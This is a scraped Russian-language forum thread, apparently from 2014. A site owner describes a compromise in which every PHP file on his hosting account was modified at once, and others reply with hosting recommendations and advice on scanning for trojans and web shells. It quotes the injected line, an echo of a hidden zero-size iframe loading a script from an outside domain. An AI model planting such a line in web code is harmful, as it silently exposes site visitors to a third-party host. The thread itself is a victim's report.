Добро пожаловать, Гость!
:: + Добавить ссылку через биллинг
:: + Добавить ссылку анонимно
❤️МИР, ЯРКИХ ЗНАКОМСТВ И ОБЩЕНИЯ!❤️
❤️МИР, ЯРКИХ ЗНАКОМСТВ И ОБЩЕНИЯ!❤️
Тема закрыта для обсуждения
Странный взлом - Страница 3
Архив закрытых тем | Странный взлом
Romka
:
Всем привет! Ребята вот такое произошло вчера:
Сижу в чате общаюсь на своем сайте и тут бац на сайте одни реоглефы!
Ну я сразу в ISP manager и сразу обратил внимание на то что ВСЕ php файлы изменены в одно время 22:55
вот скрин Ссылка и что самое интересное что у меня были там тестовые сайты и просто папки в WWW доменах и даже там все файлы изменены т.е не только на сайте!
я обнаружил что именно вставили во все файлы - вот такой код в самый низ файлов был вставлен: echo '<iframe src=http://www.kalogeizer.by/traff.php width=0 height=0></iframe>'; вот скрин Ссылка
Ребята что вы можете сказать по этому поводу? как такое можно было сделать за 1 минуту?
*Я все все при все файлы уже исправил,каждый файлик,папку просмотрел,шелов нет,сайт уже работает,но боюсь что повториться!
* мне недавно писали что хостинг на котором мой сайт расположен мол не безопасный!
Очень прошу кто понимает в чем дело отпишетесь!
Странный взлом
11 Июня 2014Всем привет! Ребята вот такое произошло вчера:
Сижу в чате общаюсь на своем сайте и тут бац на сайте одни реоглефы!
Ну я сразу в ISP manager и сразу обратил внимание на то что ВСЕ php файлы изменены в одно время 22:55
вот скрин Ссылка и что самое интересное что у меня были там тестовые сайты и просто папки в WWW доменах и даже там все файлы изменены т.е не только на сайте!
я обнаружил что именно вставили во все файлы - вот такой код в самый низ файлов был вставлен: echo '<iframe src=http://www.kalogeizer.by/traff.php width=0 height=0></iframe>'; вот скрин Ссылка
Ребята что вы можете сказать по этому поводу? как такое можно было сделать за 1 минуту?
*Я все все при все файлы уже исправил,каждый файлик,папку просмотрел,шелов нет,сайт уже работает,но боюсь что повториться!
* мне недавно писали что хостинг на котором мой сайт расположен мол не безопасный!
Очень прошу кто понимает в чем дело отпишетесь!
Комментарии:
Hack 28 Июня 2014
Два суперских хоста.
ISmile010, не помню кто посоветовал xostzone.ru вот там и сидел почти год пока эта хрень не произошла! а после того как произошла решил что все хватит терпеть их 502 ошибку и перешел на хостин aqvaviva.ru и ОЧЕНЬ доволен!
Romka, Ясно, советую аквавива или кеоISmile010, не помню кто посоветовал xostzone.ru вот там и сидел почти год пока эта хрень не произошла! а после того как произошла решил что все хватит терпеть их 502 ошибку и перешел на хостин aqvaviva.ru и ОЧЕНЬ доволен!
Два суперских хоста.
Автор темы
Вика, я это понял! у меня в топе был троян а я этого и не знал, пока не наткнулся случайно! а про сайт это я что тоже мол хорошая штука которая помогает нам в этом не легком деле)
Автор темы
Вика, я это понял! у меня в топе был троян а я этого и не знал, пока не наткнулся случайно! а про сайт это я что тоже мол хорошая штука которая помогает нам в этом не легком деле)
Вика 28 Июня 2014
Romka (28 Июня 2014):
Вика, Хорошая штука! жалско у меня нет такого приходилось самому все руками смотреть+ сайтом пользуюсь!
Romka, Так он только на вирусы сканирует А шеллы и другую нечисть надо проверять вручную Вика, Хорошая штука! жалско у меня нет такого приходилось самому все руками смотреть+ сайтом пользуюсь!
Romka
28 Июня 2014
Автор темы
Вика, Хорошая штука! жалско у меня нет такого приходилось самому все руками смотреть+ сайтом пользуюсь!
Автор темы
Romka
28 Июня 2014
Автор темы
ISmile010, не помню кто посоветовал xostzone.ru вот там и сидел почти год пока эта хрень не произошла! а после того как произошла решил что все хватит терпеть их 502 ошибку и перешел на хостин aqvaviva.ru и ОЧЕНЬ доволен!
Автор темы